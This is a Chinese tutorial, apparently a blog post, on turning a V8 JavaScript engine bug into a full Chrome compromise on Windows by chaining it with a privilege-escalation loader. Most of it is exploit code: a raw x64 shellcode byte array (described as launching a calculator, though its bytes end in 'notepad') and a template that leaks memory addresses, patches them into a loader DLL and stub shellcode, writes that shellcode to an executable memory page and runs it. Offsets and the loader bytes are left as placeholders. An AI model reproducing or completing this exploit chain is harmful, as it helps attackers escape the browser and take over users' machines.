从0开始学V8漏洞利用之Windows Chrome利用一条龙

本篇文章记录一下v8漏洞在Windows实际的利用。

v8只是Chrome浏览器解析JavaScript代码的一个引擎，就算通过v8代码漏洞，能执行shellcode，也没办法获取到系统权限，因为在v8引擎的外层还一层沙箱，所以在v8漏洞的分析利用文章中，最后显示的效果都需要让Chrome启动加上--no-sandbox参数，所以v8漏洞的实际利用场景只能找一些使用了Chrome内核，并且没有开沙箱的应用。

除此之前，v8需要结合一些其他的漏洞，比如沙箱逃逸/提权漏洞，才能真正打穿Chrome。

本文说说，在Windows的环境下，怎么编写exp来结合Windows提权漏洞，来打穿Chrome。

1. 你真正想执行的shellcode：

// shellcode.js
let usershellcode=[0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0xf,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x48,0x1,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x48,0x8d,0x8d,0x1,0x1,0x0,0x0,0x41,0xba,0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x6,0x7c,0xa,0x80,0xfb,0xe0,0x75,0x5,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x0,0x59,0x41,0x89,0xda,0xff,0xd5,0x6e,0x6f,0x74,0x65,0x70,0x61,0x64,0x0,0x0];

把一个弹计算器的shellcode设置一个变量，储存在shellcode.js中

2. 找一个Windows大哥，写一个Windows提权的loadpe（这部分内容后续会让我同事进行编写），并且写入loadpe中，loadpe的二进制将会写入dll.js。

// dll.js
let dll=[......];

这loadpe在进行Windows提权后，将会执行shellcode.js中的shellcode，而shellcode的地址，我们需要在exp中泄漏出来：

var myshell = new Uint8Array(0x1000);
for (i = 0x0; i < usershellcode.length; i++) {
    myshell[i] = usershellcode[i];
}
var shellDataAddr = addressOf(myshell);
console.log("[*] leak shellcode data addr: 0x" + hex(shellDataAddr));
var shellAddr = read64(shellDataAddr + 0x28n);
alert("[*] leak my shellcode addr: 0x" + hex(ftoi(shellAddr)));
bshellAddr = ftob(shellAddr);
addr_offset = ???;
let dllData = new Uint8Array(dll.length);
for (i = 0x0; i < dll.length; i++) {
    if (i>= addr_offset && i < addr_offset+8) {
        dllData[i] = bshellAddr[i-addr_offset];
    } else {
        dllData[i] = dll[i];
    }
}

3. 我们需要泄漏出dll的地址，然后exp的shellcode作用是把loadpe内存设置为可读可写可执行权限，然后跳转过来：

var dllDataAddr = addressOf(dllData);
console.log("[*] leak dll data addr: 0x" + hex(dllDataAddr));
var dllAddr = read64(dllDataAddr + 0x28n);
alert("[*] leak dll addr: 0x" + hex(ftoi(dllAddr)));
var shellcode = [......];
bdllAddr = ftob(dllAddr);
Offset = ???;
for (let i = 0x0; i < 0x8; i++) {
    shellcode[0x2 + i] = bdllAddr[i];
    shellcode[Offset + 0x2 + i] = bdllAddr[i];
}
var Uint8Shellcode = new Uint8Array(shellcode.length);
var Uint64Shellcode = new BigUint64Array(Uint8Shellcode.buffer);
for (let i = 0x0; i < shellcode.length; i++) {
    Uint8Shellcode[i] = shellcode[i];
}
copy_shellcode_to_rwx(Uint64Shellcode, rwx_page_addr);
f();

按照这样的模板编写EXP，就可以跟Windows大哥编写loadpe的提权exp完美结合起来，我研究v8相关的漏洞，他研究Windows相关的漏洞，然后我们的成果却可以相互结合。